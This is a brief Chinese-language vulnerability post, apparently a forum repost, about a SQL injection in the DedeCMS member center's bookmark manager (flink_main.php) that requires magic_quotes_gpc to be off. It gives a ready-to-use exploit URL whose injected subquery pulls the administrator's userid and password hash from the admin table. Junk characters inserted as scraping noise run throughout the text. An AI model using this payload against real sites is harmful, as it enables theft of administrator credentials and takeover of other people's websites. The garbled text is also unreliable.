DedeCMS会员中心SQL注射漏洞
, ] e) P7 j0 R! f" r需要magic_quotes_gpc = Off
2 V1 ?) Z9 ?# Q1 f. J会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
W+ j$ @: ?+ e4 \ 8 k( e; m' x9 i
DedeCMS会员中心书签管理SQL注射漏洞& d( X7 p) ^' p5 R* V
成功利用该漏洞可获得管理员密码
+ c4 P) T! _8 u4 ` ' o/ C2 l# ~% L
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
7 b3 i9 T6 Y2 `" V& F- G
% p4 m, k4 F5 T& j2 ihttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r2 t% N; w6 C* T s; |' T
|